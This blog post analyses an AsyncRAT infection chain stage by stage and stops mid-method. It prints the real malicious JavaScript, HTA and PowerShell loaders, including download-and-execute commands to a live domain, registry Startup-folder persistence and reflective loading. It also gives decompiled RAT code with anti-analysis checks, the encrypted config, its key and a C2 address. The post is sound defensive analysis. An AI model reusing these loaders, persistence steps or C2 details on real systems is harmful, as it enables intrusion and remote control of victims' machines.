
Unravelling 4 stages of AsyncRAT

As I usually do, I was cruising bazaar.abuse.ch and found a JavaScript sample. I quite enjoy the scripting ones because they typically come with a few different stages. So, this post is just going to run through those stages and, spoiler alert, reveal AsyncRAT. I think this is the source: NYAN-x-CAT/AsyncRAT-C-Sharp.

Stage 1

The first stage is a nice little JavaScript file:

pyylqohe = ("ipt.Shel")
var wzygyoen = WScript.CreateObject("WScr"+pyylqohe+"l")
ujnqrlkb = ("m")
qmsjhapy = ("sh")
zcgptlcr = ("ta ")
wzygyoen.Run((ujnqrlkb+qmsjhapy+zcgptlcr)+" https://t.ly/3HaN",0)

Pretty easy to read. Looking at the following:

pyylqohe = ("ipt.Shel")
var wzygyoen = WScript.CreateObject("WScr"+pyylqohe+"l")

It clearly becomes:

var wscriptObject = WScript.CreateObject("WScript.Shell")

And then:

ujnqrlkb = ("m")
qmsjhapy = ("sh")
zcgptlcr = ("ta ")
wscriptObject.Run((ujnqrlkb+qmsjhapy+zcgptlcr)+" https://t.ly/3HaN",0)

Is:

wscriptObject.Run("mshta https://t.ly/3HaN",0)

Passing it into unshorten.it, it gives: https://hopkinsvillereunions.com/JyN.txt

Reaching out to this URL gives more code:

Stage 2

Stage 2 is a HTML Application file:

<HTML>
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -3000,-3000
Dim xlbltz
Set xlbltz = CreateObject("WScript.Shell")
vbrjo = StrReverse(" llehsrewoP")
lfbdx = StrReverse("; )'gpj.9muTbnggcCTPmpDu/semeht/tnetnoc-pw/moc.snoinuerellivsnikpoh//:sptth'(b2a$.3a$ X`E`I = bb$;)1a$ tcejbO-weN( = 3a$;)'gni','&*&*&*&*&*'(ecalpeR.)'sdao','########'(ecalpeR.)'oD','!!!!!!!!!!!'(ecalpeR.'&*&*&*&*&*rt########lnw!!!!!!!!!!!' =b2a$;)'eilC','!@!@!@!@!@!@'(ecalpeR.)'W.te','%$%$%$%$'(ecalpeR.)'etsy','@&@&@&@&@&@&'(ecalpeR.'tn!@!@!@!@!@!@be%$%$%$%$N.m@&@&@&@&@&@&S' = 1a$")
gjlafk = (vbrjo+lfbdx)
xlbltz.Run gjlafk,0
self.close
</script>
<body>
demo
</body>
</HEAD>

This has a few references to StrReverse, so that's easily undone:

<HTML>
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -3000,-3000
Dim xlbltz
Set xlbltz = CreateObject("WScript.Shell")
vbrjo = "Powershell"
lfbdx = "$a1 = 'S&@&@&@&@&@&@m.N$%$%$%$%eb@!@!@!@!@!@!nt'.Replace('&@&@&@&@&@&@','yste').Replace('$%$%$%$%','et.W').Replace('@!@!@!@!@!@!','Clie');$a2b= '!!!!!!!!!!!wnl########tr*&*&*&*&*&'.Replace('!!!!!!!!!!!','Do').Replace('########','oads').Replace('*&*&*&*&*&','ing');$a3 = (New-Object $a1);$bb = I`E`X $a3.$a2b('https://hopkinsvillereunions.com/wp-content/themes/uDpmPTCcggnbTum9.jpg') ;"
gjlafk = (vbrjo+lfbdx)
xlbltz.Run gjlafk,0
self.close
</script>
<body>
demo
</body>
</HEAD>

Renaming variables:

<HTML>
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -3000,-3000
Dim wscript_object
Set wscript_object = CreateObject("WScript.Shell")
powershell_string = "Powershell"
powershell_cmd = "$a1 = 'S&@&@&@&@&@&@m.N$%$%$%$%eb@!@!@!@!@!@!nt'.Replace('&@&@&@&@&@&@','yste').Replace('$%$%$%$%','et.W').Replace('@!@!@!@!@!@!','Clie');$a2b= '!!!!!!!!!!!wnl########tr*&*&*&*&*&'.Replace('!!!!!!!!!!!','Do').Replace('########','oads').Replace('*&*&*&*&*&','ing');$a3 = (New-Object $a1);$bb = I`E`X $a3.$a2b('https://hopkinsvillereunions.com/wp-content/themes/uDpmPTCcggnbTum9.jpg') ;"
concat_ps_command = (powershell_string+powershell_cmd)
wscript_object.Run concat_ps_command,0
self.close
</script>
<body>
demo
</body>
</HEAD>

Looking at the command, it's using junk strings and .Replace() to obfuscate things:

$a1 = 'S&@&@&@&@&@&@m.N$%$%$%$%eb@!@!@!@!@!@!nt'.Replace('&@&@&@&@&@&@','yste').Replace('$%$%$%$%','et.W').Replace('@!@!@!@!@!@!','Clie');$a2b= '!!!!!!!!!!!wnl########tr*&*&*&*&*&'.Replace('!!!!!!!!!!!','Do').Replace('########','oads').Replace('*&*&*&*&*&','ing');$a3 = (New-Object $a1);$bb = I`E`X $a3.$a2b('https://hopkinsvillereunions.com/wp-content/themes/uDpmPTCcggnbTum9.jpg') ;

Eventually it calls Invoke-Expression, but let's break it down. As it's doing a bunch of replaces, one option is to go through and apply each of them by hand. An easier method is to remove IEX and let it run, printing what it would have executed:

$a1 = 'S&@&@&@&@&@&@m.N$%$%$%$%eb@!@!@!@!@!@!nt'.Replace('&@&@&@&@&@&@','yste').Replace('$%$%$%$%','et.W').Replace('@!@!@!@!@!@!','Clie');
$a2b= '!!!!!!!!!!!wnl########tr*&*&*&*&*&'.Replace('!!!!!!!!!!!','Do').Replace('########','oads').Replace('*&*&*&*&*&','ing');
$a3 = (New-Object $a1);
write-host $a3 $a2b

Executing the above gives:

So, overall, the command resolves to:

IEX (New-Object System.Net.WebClient).Downloadstring('https://hopkinsvillereunions.com/wp-content/themes/uDpmPTCcggnbTum9.jpg')
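The strings in the stage 2 one-liner can also be recovered without executing anything. The Go program below is an added example, not code from the post: it statically emulates the chained .Replace() calls against the command copied from the HTA (the regexes and function names are mine).

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// The stage 2 PowerShell one-liner as recovered from the HTA above.
const stage2 = "$a1 = 'S&@&@&@&@&@&@m.N$%$%$%$%eb@!@!@!@!@!@!nt'.Replace('&@&@&@&@&@&@','yste').Replace('$%$%$%$%','et.W').Replace('@!@!@!@!@!@!','Clie');$a2b= '!!!!!!!!!!!wnl########tr*&*&*&*&*&'.Replace('!!!!!!!!!!!','Do').Replace('########','oads').Replace('*&*&*&*&*&','ing');$a3 = (New-Object $a1);$bb = I`E`X $a3.$a2b('https://hopkinsvillereunions.com/wp-content/themes/uDpmPTCcggnbTum9.jpg') ;"

var (
	// $name = 'literal'.Replace('a','b')...  (single-quoted PowerShell literals, no escapes)
	assignRe  = regexp.MustCompile(`\$(\w+)\s*=\s*('[^']*'(?:\.Replace\('[^']*','[^']*'\))*)`)
	literalRe = regexp.MustCompile(`^'([^']*)'`)
	replaceRe = regexp.MustCompile(`^\.Replace\('([^']*)','([^']*)'\)`)
)

// EmulateReplaceChain evaluates 'lit'.Replace(a,b).Replace(c,d)... the way .NET
// String.Replace does: every occurrence, left to right, one call at a time.
func EmulateReplaceChain(expr string) (string, error) {
	m := literalRe.FindStringSubmatch(expr)
	if m == nil {
		return "", errors.New("expression must start with a single-quoted literal")
	}
	cur, rest := m[1], expr[len(m[0]):]
	for rest != "" {
		r := replaceRe.FindStringSubmatch(rest)
		if r == nil {
			return "", fmt.Errorf("unsupported trailer %q", rest)
		}
		cur = strings.ReplaceAll(cur, r[1], r[2])
		rest = rest[len(r[0]):]
	}
	return cur, nil
}

// ResolveAssignments finds every $var = 'literal'.Replace(...) assignment in a script
// and returns the variable names mapped to their resolved values.
func ResolveAssignments(script string) map[string]string {
	out := map[string]string{}
	for _, m := range assignRe.FindAllStringSubmatch(script, -1) {
		if v, err := EmulateReplaceChain(m[2]); err == nil {
			out[m[1]] = v
		}
	}
	return out
}

func main() {
	for name, v := range ResolveAssignments(stage2) {
		fmt.Printf("$%s = %q\n", name, v)
	}
}
```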

Grabbing that:

Stage 3

More stagers! This time it finally lands in PowerShell:

Function NJXH
{
[system.io.directory]::CreateDirectory("C:\P"+"r"+"o"+"g"+"ra"+"mDa"+"t"+"a\Micr"+"oso"+"f"+"t A"+"rts"+"\S"+"ta"+"rt\")
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";

$p = 'C:\ProgramData\Microsoft Arts\Start\'
$ps1 = 'C:\Users\Public\'
$ali = 'C:\Users\Public\'

start-sleep -s 5
if((New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/808540577594736675/852340086528147476/firefox.lnk', $p + 'firefox.lnk')){
}

if((New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/808540577594736675/852340062045077534/firefox.bat', $ps1 + 'firefox.bat')){
}

if((New-Object System.Net.WebClient).DownloadFile('https://hopkinsvillereunions.com/wp-content/themes/TutrZFMMnSRNVaOq.jpg' , $ali + 'mgenajogeaub.ps1')){
}
start "C:\ProgramData\Microsoft Arts\Start\firefox.lnk"
}

Tidying it up:

Function NJXH
{
    [system.io.directory]::CreateDirectory("C:\ProgramData\Microsoft Arts\Start\")
    start-sleep -s 5
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
    start-sleep -s 5
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";

    $p = 'C:\ProgramData\Microsoft Arts\Start\'
    $ps1 = 'C:\Users\Public\'
    $ali = 'C:\Users\Public\'

    start-sleep -s 5
    if((New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/808540577594736675/852340086528147476/firefox.lnk', $p + 'firefox.lnk'))
    {

    }

    if((New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/808540577594736675/852340062045077534/firefox.bat', $ps1 + 'firefox.bat'))
    {

    }

    if((New-Object System.Net.WebClient).DownloadFile('https://hopkinsvillereunions.com/wp-content/themes/TutrZFMMnSRNVaOq.jpg' , $ali + 'mgenajogeaub.ps1'))
    {

    }
    start "C:\ProgramData\Microsoft Arts\Start\firefox.lnk"
}

So, some persistence is being done here. The tell is that both Shell Folders registry values for Startup are pointed at C:\ProgramData\Microsoft Arts\Start, so anything dropped into that directory runs at logon. The lnk is downloaded to $p (that new Startup directory), with a .bat and a .ps1 going to C:\Users\Public.

Curling https://cdn.discordapp.com/attachments/808540577594736675/852340086528147476/firefox.lnk gives the following response:

<title>Suspected phishing site | Cloudflare</title>

and:

<p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p>

So that's been nuked. As has: https://cdn.discordapp.com/attachments/808540577594736675/852340086528147476/firefox.lnk.

However! The final URL is still up, and what it returns (saved as mgenajogeaub.ps1) carries a PE: https://hopkinsvillereunions.com/wp-content/themes/TutrZFMMnSRNVaOq.jpg

Stage 4

As this is the final stage, I dumped it into hybrid-analysis, which comes back with a 58/100 threat score and a whole bunch of data related to that domain:

Malicious artifacts seen in the context of the input URL

details
    Found malicious artifacts related to the input domain "https://hopkinsvillereunions.com" (IP: 107.180.91.236): ...

source
    Network Traffic
relevance
    10/10

I love seeing this kind of obfuscation; I find it so cool. All 0's are replaced with bur3o:

I'll just do the replace. Once that's done, another one is revealed:

Stripping those HUGE blobs out leaves the following:

FUNCTION Work($WorkE)
{
  $Workx = "F"+"r"+"o"+"m"+"B"+"a"+"s"+"e"+"6"+"4"+"S"+"t"+"r"+"i"+"n"+"g"
  $WorkG = [Text.Encoding]::Utf8.GetString([Convert]::$Workx($WorkE))
  return $WorkG
}

Function HBar {
 
    [CmdletBinding()]
    [OutputType([byte[]])]
    param(
        [Parameter(Mandatory=$true)] [String]$H3
    )
    $H2 = New-Object -TypeName byte[] -ArgumentList ($H3.Length / 2)
    for ($i = 0; $i -lt $H3.Length; $i += 2) {
        $H2[$i / 2] = [Convert]::ToByte($H3.Substring($i, 2), 16)
    }

    return [byte[]]$H2
}
[String]$H4 = ''

[Byte[]]$H5=HBar $H4
[String]$Server = ''
[Byte[]]$H1=HBar $Server
$JUANADEARCO = 'W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRINSkuR2V0VHlwZSgnVkJORVQuUEUnKS5HZXRNZXRob2QoJ1J1bicpLkludm9rZSgkbnVsbCxbb2JqZWN0W11dICggJ0M6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxhc3BuZXRfY29tcGlsZXIuZXhlJywkSDEpKQ=='
$REYKI = Work($JUANADEARCO);$Run=($REYKI -Join '')|I`E`X

Making this more readable:

FUNCTION Base64Decode($b64)
{
  # $input is an automatic variable in PowerShell, so the parameter is named $b64 instead
  return [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($b64))
}

Function ConvertToHex {
 
    [CmdletBinding()]
    [OutputType([byte[]])]
    param(
        [Parameter(Mandatory=$true)] [String]$H3
    )
    # Despite the name, this turns a hex string into raw bytes, two characters per byte
    $H2 = New-Object -TypeName byte[] -ArgumentList ($H3.Length / 2)
    for ($i = 0; $i -lt $H3.Length; $i += 2)
    {
        $H2[$i / 2] = [Convert]::ToByte($H3.Substring($i, 2), 16)
    }
    return [byte[]]$H2
}

[Byte[]]$H5=ConvertToHex $H4
[Byte[]]$H1=ConvertToHex $Server
# $JUANADEARCO is the base64 string from the original; decoded, it reads:
# [Reflection.Assembly]::Load($H5).GetType('VBNET.PE').GetMethod('Run').Invoke($null,[object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$H1))
$JUANADEARCO = 'W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRINSkuR2V0VHlwZSgnVkJORVQuUEUnKS5HZXRNZXRob2QoJ1J1bicpLkludm9rZSgkbnVsbCxbb2JqZWN0W11dICggJ0M6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxhc3BuZXRfY29tcGlsZXIuZXhlJywkSDEpKQ=='
$REYKI = Base64Decode($JUANADEARCO)
$Run=($REYKI -Join '')|IEX

HBar() turns a hex string into a byte array (I kept the ConvertToHex name from the rename above), and Work() is a Base64 wrapper. To actually get the payload, I'll do this:

FUNCTION Base64Decode($b64)
{
  # $input is an automatic variable in PowerShell, so the parameter is named $b64 instead
  return [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($b64))
}

Function ConvertToHex {
 
    [CmdletBinding()]
    [OutputType([byte[]])]
    param(
        [Parameter(Mandatory=$true)] [String]$H3
    )
    $H2 = New-Object -TypeName byte[] -ArgumentList ($H3.Length / 2)
    for ($i = 0; $i -lt $H3.Length; $i += 2)
    {
        $H2[$i / 2] = [Convert]::ToByte($H3.Substring($i, 2), 16)
    }
    return [byte[]]$H2
}

# -Raw keeps each blob as one string instead of joining lines with spaces
[String]$H4 = (Get-Content "stage4-h4.dat" -Raw).Trim()
[String]$Server = (Get-Content "stage4-server.dat" -Raw).Trim()

[Byte[]]$H5=ConvertToHex $H4
[Byte[]]$H1=ConvertToHex $Server
Write-Host $H5
Write-Host $H1

For the sake of not killing Sublime Text, the two blobs live in .dat files and are read in with Get-Content:

The $H5 variable:

CyberChefing from decimal:

Exporting and looking at the file, it reveals it to be VBNET.dll:

Looking at this in PEStudio, it's very likely to do some PPID spoofing and injection:

I will come back to that later. And now for $H1:

"Stub", Lol. Throwing it into PEStudio:

This one has a lot more going on. It has base64, anti-debugging, and all sorts.

Stage 5

Recap: at this point, there are two binaries:

SHA256                                                            File Format  Name
91E89B9C89BEE655B18D596E4AEC6BD3D44658A2EA7CB90A97A018DA9E6DB858  DLL          VBNET.dll
22B5BF913635BC456D04899B2AC3E26669C6FC450E2A0EB01A695A9F717BCC85  Exe          Stub.exe

Exe

The Exe has a lot of stuff I want to poke at, specifically the base64 strings. But first, hybrid-analysis gives this a 70/100 threat score and flags the PE talking on a port typically used by IRC:

Sends network traffic on a port typically used by IRC

details
    "IRC traffic to 77.247.127.9 on port 6666 
source
    Network Traffic
relevance
    6/10
ATT&CK ID
    T1043

That's found the C2, but let's dig into it further. Back to the base64: unfortunately the strings are a bit too long to dump here, and when decoded they don't reveal much on their own. Moving on.

Because CLR DLLs are being imported, it's safe to assume this is .NET and can be decompiled with dotPeek:

Right off the bat it's trying to be clever:

public static void Main()
{
  for (int index = 0; index < Convert.ToInt32(Settings.Delay); ++index)
    Thread.Sleep(1000);
  if (!Settings.InitializeSettings())
    Environment.Exit(0);
  try
  {
    if (!MutexControl.CreateMutex())
      Environment.Exit(0);
    if (Convert.ToBoolean(Settings.Anti))
      Anti_Analysis.RunAntiAnalysis();
    if (Convert.ToBoolean(Settings.Install))
      NormalStartup.Install();
    if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin())
      ProcessCritical.Set();
    Methods.PreventSleep();
  }
  catch
  {
  }
  while (true)
  {
    try
    {
      if (!ClientSocket.IsConnected)
      {
        ClientSocket.Reconnect();
        ClientSocket.InitializeClient();
      }
    }
    catch
    {
    }
    Thread.Sleep(5000);
  }
}

Execution Delay:

for (int index = 0; index < Convert.ToInt32(Settings.Delay); ++index)
Thread.Sleep(1000);

Where Settings.Delay is:

public static string Delay = "3";

The next line then checks whether it was able to initialise, which Settings.InitializeSettings() shows:

public static bool InitializeSettings()
{
  try
  {
    Settings.Key = Encoding.UTF8.GetString(Convert.FromBase64String(Settings.Key));
    Settings.aes256 = new Aes256(Settings.Key);
    Settings.Ports = Settings.aes256.Decrypt(Settings.Ports);
    Settings.Hosts = Settings.aes256.Decrypt(Settings.Hosts);
    Settings.Version = Settings.aes256.Decrypt(Settings.Version);
    Settings.Install = Settings.aes256.Decrypt(Settings.Install);
    Settings.MTX = Settings.aes256.Decrypt(Settings.MTX);
    Settings.Pastebin = Settings.aes256.Decrypt(Settings.Pastebin);
    Settings.Anti = Settings.aes256.Decrypt(Settings.Anti);
    Settings.BDOS = Settings.aes256.Decrypt(Settings.BDOS);
    Settings.Group = Settings.aes256.Decrypt(Settings.Group);
    Settings.Hwid = HwidGen.HWID();
    Settings.Serversignature = Settings.aes256.Decrypt(Settings.Serversignature);
    Settings.ServerCertificate = new X509Certificate2(Convert.FromBase64String(Settings.aes256.Decrypt(Settings.Certificate)));
    return Settings.VerifyHash();
  }
  catch
  {
    return false;
  }
}

If everything decrypts and works fine, then it's good to go. Next, it creates a mutex so only one instance runs:

if (!MutexControl.CreateMutex())
    Environment.Exit(0);

After that, the anti-analysis checks:

if (Convert.ToBoolean(Settings.Anti))
  Anti_Analysis.RunAntiAnalysis();

The Anti_Analysis class (partial):

  internal class Anti_Analysis
  {
    public static void RunAntiAnalysis()
    {
      if (!Anti_Analysis.DetectManufacturer() && !Anti_Analysis.DetectDebugger() && (!Anti_Analysis.DetectSandboxie() && !Anti_Analysis.IsSmallDisk()) && !Anti_Analysis.IsXP())
        return;
      Environment.FailFast((string) null);
    }

    private static bool IsSmallDisk()
    {
      try
      {
        long num = 61000000000;
        if (new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize <= num)
          return true;
      }
      catch
      {
      }
      return false;
    }
    // remaining checks (DetectManufacturer, DetectDebugger, DetectSandboxie, IsXP) omitted
  }

Not too fussed about this at the moment. Once that's done, it installs persistence, optionally marks itself critical, and changes the sleep settings:

if (Convert.ToBoolean(Settings.Install))
  NormalStartup.Install();
if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin())
  ProcessCritical.Set();
Methods.PreventSleep();

Finally, connect:

  while (true)
  {
    try
    {
      if (!ClientSocket.IsConnected)
      {
        ClientSocket.Reconnect();
        ClientSocket.InitializeClient();
      }
    }
    catch
    {
    }
    Thread.Sleep(5000);
  }

The settings:

public static string Ports = "t2nKOzYj0cOv2qg0u7nSEzre18jIRtMkff+A1fJwmx9S2cNE4bS0isw35a+elH8vvEeq9rxQQr8ctp7SXAHv+g==";
public static string Hosts = "l1VDtNQHYKw7oyejimwLEz6zOLp1GHm1MdlVlcglHPTNq6anPKeOUkfpT/uMgKB+uioOQOcc9kSHroapCjYk9g==";
public static string Version = "24o55NfpOilJhXezbajaIIb7jIZcr0rs/SWgCkY3w2BpRI/dWG+4pbVfe8DcM0IDLonhFKodRBDiDa7PvXUocg==";
public static string Install = "fLeN4+ZnNpHyL2eJbS7qkLdXAUi7wgp7SAVvuTwoPFLJyCgnmbhGYImfzVCDWdQ2bj3EtNFOyUK8rlPbb0L7Xg==";
public static string InstallFolder = "%AppData%";
public static string InstallFile = "";
public static string Key = "RFo5TjhDZjBwMHRLOWpuSHZqdkI5Wm5DcWJMVmE0RHQ=";
public static string MTX = "b7qHN0k+Zdo1gIrDiUYyNSkb7tmNLp2Uoc3ePKH2RSO5qM74MOlyATBPU66ctkvwLGfAL76/CIAY3H5WLw1bZiqAbzogm+cj+kEXLR4OwQI=";
public static string Certificate = "...";  // long base64 blob omitted here
public static string Serversignature = "I++EqoTbWaQ18dZ+DbXDG2Zq+S7/Fu0BsIDqeIGAYon7F+GNRWIVN+gZDsKGUhk4Y9oQ+aHr68H78iR99ZoBOm4zsqqjpSpke3heysvXPHdCTVnhMoXiT95qK0yHWkhEAssPXcQlJ3E0BAmDdj83Xzi+Xk6I+9hbgkz1jch8QR3mjJqqUVgjAkh9ymZuluih+epFScM+uf0MpBBAHre4bQkNts+6w9ubf6g2VD0e5Ipt0+VzRhspNhpdr14Eg81vd0wEj6oFYm1UxiPSJjWeF6D8+DEGSxNjmuLr8ODj1jbYMVXZ0598kDXxcZ/fqGuHrkC1EaXH0SybcumLqqwqZ4MBpQCsC7xCCFU689RJqTlt9NJnhwy0fps+28N4UTEl00FHOXYMBnmHsG111jWsIZXmke8t0bJCDRltq1o0nCKf2lUI07/yiS1OVUtaeBepWK+BZxk2ggbkJvjfFhVJZboxFb9h8yK5s+4fE1DvqHcxgTixpk7CEx4/RlTrd0Ol1mCOkNLpH6oe67UC8KqX7ZLUgT/YIH4lU/h3askcEJzXWQ4YFf1xiQD6tcy1QCF9RBHJfQO3umwx0RzvKEP07o6FtPhmkOYyx9PLnFLAhYD4BuAlhyf9dkKANXUZdNokRBn7fOD5CXtxHQqhaVnVK024LnrDlxFE7HbxMSlDfF1BbM6wmVNE3NUcFvHuTwl5kyMf8S0xRYGd04EiiPMuj7ZlwAsphOUj7GonsHGJVOVNSzmEraTZEWtAKV/89ooDPLGt2+/SqOcFS4bofxEYwx3WLI8nQPy0C+AuD5J37/ZnuO4GogZcPJ0AR6CAn0KFsCKsSgJ0pgICQ19MOpk7XU23DDo6OOQPGLK9pMZHdjp04GSCmZm8XIYnaXzODX33UtgfVy03c+91EknkxMPQqpHPx8PZzJvwbFpvbjhUvemCpr4uxYiWznVDkb3XjxGUf2ZBmY07p9qmO+/xooD4rw==";
public static X509Certificate2 ServerCertificate;
public static string Anti = "I9XbE9Y40w3b9h/252aXK3u3bOO9/cfbF48D4PqX1Nhx1lX3sAjOHSlPXNaUnA34kvPmCwiYwpKt2ButV3QDJA==";
public static Aes256 aes256;
public static string Pastebin = "H1jGb2NK/kGDPUld1Reh0VhfkUT1avpNoDOqgvb7luGqHBGAkWB+XsvBXESc5MCgrtFY7KXEB77kZ6jjFAQNJw==";
public static string BDOS = "KBfTz24fL86ElK7C9Yl6ZE7mMLjov+CGSf7lapyRcxsTe2U9ODSTyXV0oxaYpKMxic5MiANIX2KW1MggpPYZuQ==";
public static string Hwid = (string) null;
public static string Delay = "3";
public static string Group = "BDlmfJugzGq/Zshig+2ddnPtiMlHrM+OU7R4dJA1AHRRxVlTetFcwfD+oRsMM4JrDXDX/FrDKFh4Vtno15urKQ==";

Conveniently, these are all the base64 strings from earlier, and the initialisation section confirms they are AES-encrypted:

Settings.Key = Encoding.UTF8.GetString(Convert.FromBase64String(Settings.Key));
Settings.aes256 = new Aes256(Settings.Key);
Settings.Ports = Settings.aes256.Decrypt(Settings.Ports);
Settings.Hosts = Settings.aes256.Decrypt(Settings.Hosts);
Settings.Version = Settings.aes256.Decrypt(Settings.Version);
Settings.Install = Settings.aes256.Decrypt(Settings.Install);
Settings.MTX = Settings.aes256.Decrypt(Settings.MTX);
Settings.Pastebin = Settings.aes256.Decrypt(Settings.Pastebin);
Settings.Anti = Settings.aes256.Decrypt(Settings.Anti);
Settings.BDOS = Settings.aes256.Decrypt(Settings.BDOS);
Settings.Group = Settings.aes256.Decrypt(Settings.Group);
Settings.Hwid = HwidGen.HWID();
Settings.Serversignature = Settings.aes256.Decrypt(Settings.Serversignature);
Settings.ServerCertificate = new X509Certificate2(Convert.FromBase64String(Settings.aes256.Decrypt(Settings.Certificate)));
return Settings.VerifyHash();

Because .NET is easy, I just pulled out all the decryption code and reassembled it locally:

The code:

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading.Tasks;

namespace Decrypter
{
    public static class HwidGen
    {
        public static string HWID()
        {
            try
            {
                return HwidGen.GetHash(Environment.ProcessorCount.ToString() + Environment.UserName + Environment.MachineName + (object)Environment.OSVersion + (object)new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize);
            }
            catch
            {
                return "Err HWID";
            }
        }

        public static string GetHash(string strToHash)
        {
            byte[] hash = new MD5CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(strToHash));
            StringBuilder stringBuilder = new StringBuilder();
            foreach (byte num in hash)
                stringBuilder.Append(num.ToString("x2"));
            return stringBuilder.ToString().Substring(0, 20).ToUpper();
        }
    }
    public class Aes256
    {
        private const int KeyLength = 32;
        private const int AuthKeyLength = 64;
        private const int IvLength = 16;
        private const int HmacSha256Length = 32;
        private readonly byte[] _key;
        private readonly byte[] _authKey;
        private static readonly byte[] Salt = new byte[32]
        {
            191, 235, 30, 86, 251, 205, 151, 59, 178, 25, 2, 36, 48, 165, 120, 67,
            0, 61, 86, 68, 210, 30, 98, 185, 212, 241, 128, 231, 230, 195, 57, 65
        };

        public Aes256(string masterKey)
        {
            if (string.IsNullOrEmpty(masterKey))
                throw new ArgumentException("masterKey can not be null or empty.");
            using (Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(masterKey, Aes256.Salt, 50000))
            {
                this._key = rfc2898DeriveBytes.GetBytes(32);
                this._authKey = rfc2898DeriveBytes.GetBytes(64);
            }
        }

        public string Encrypt(string input) => Convert.ToBase64String(this.Encrypt(Encoding.UTF8.GetBytes(input)));

        public byte[] Encrypt(byte[] input)
        {
            if (input == null)
                throw new ArgumentNullException("input can not be null.");
            using (MemoryStream memoryStream = new MemoryStream())
            {
                memoryStream.Position = 32L;
                using (AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider())
                {
                    cryptoServiceProvider.KeySize = 256;
                    cryptoServiceProvider.BlockSize = 128;
                    cryptoServiceProvider.Mode = CipherMode.CBC;
                    cryptoServiceProvider.Padding = PaddingMode.PKCS7;
                    cryptoServiceProvider.Key = this._key;
                    cryptoServiceProvider.GenerateIV();
                    using (CryptoStream cryptoStream = new CryptoStream((Stream)memoryStream, cryptoServiceProvider.CreateEncryptor(), CryptoStreamMode.Write))
                    {
                        memoryStream.Write(cryptoServiceProvider.IV, 0, cryptoServiceProvider.IV.Length);
                        cryptoStream.Write(input, 0, input.Length);
                        cryptoStream.FlushFinalBlock();
                        using (HMACSHA256 hmacshA256 = new HMACSHA256(this._authKey))
                        {
                            byte[] hash = hmacshA256.ComputeHash(memoryStream.ToArray(), 32, memoryStream.ToArray().Length - 32);
                            memoryStream.Position = 0L;
                            memoryStream.Write(hash, 0, hash.Length);
                        }
                    }
                }
                return memoryStream.ToArray();
            }
        }

        public string Decrypt(string input) => Encoding.UTF8.GetString(this.Decrypt(Convert.FromBase64String(input)));

        public byte[] Decrypt(byte[] input)
        {
            if (input == null)
                throw new ArgumentNullException("input can not be null.");
            using (MemoryStream memoryStream = new MemoryStream(input))
            {
                using (AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider())
                {
                    cryptoServiceProvider.KeySize = 256;
                    cryptoServiceProvider.BlockSize = 128;
                    cryptoServiceProvider.Mode = CipherMode.CBC;
                    cryptoServiceProvider.Padding = PaddingMode.PKCS7;
                    cryptoServiceProvider.Key = this._key;
                    using (HMACSHA256 hmacshA256 = new HMACSHA256(this._authKey))
                    {
                        byte[] hash = hmacshA256.ComputeHash(memoryStream.ToArray(), 32, memoryStream.ToArray().Length - 32);
                        byte[] numArray = new byte[32];
                        memoryStream.Read(numArray, 0, numArray.Length);
                        if (!this.AreEqual(hash, numArray))
                            throw new CryptographicException("Invalid message authentication code (MAC).");
                    }
                    byte[] buffer1 = new byte[16];
                    memoryStream.Read(buffer1, 0, 16);
                    cryptoServiceProvider.IV = buffer1;
                    using (CryptoStream cryptoStream = new CryptoStream((Stream)memoryStream, cryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Read))
                    {
                        byte[] buffer2 = new byte[memoryStream.Length - 16L + 1L];
                        byte[] numArray = new byte[cryptoStream.Read(buffer2, 0, buffer2.Length)];
                        Buffer.BlockCopy((Array)buffer2, 0, (Array)numArray, 0, numArray.Length);
                        return numArray;
                    }
                }
            }
        }

        [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
        private bool AreEqual(byte[] a1, byte[] a2)
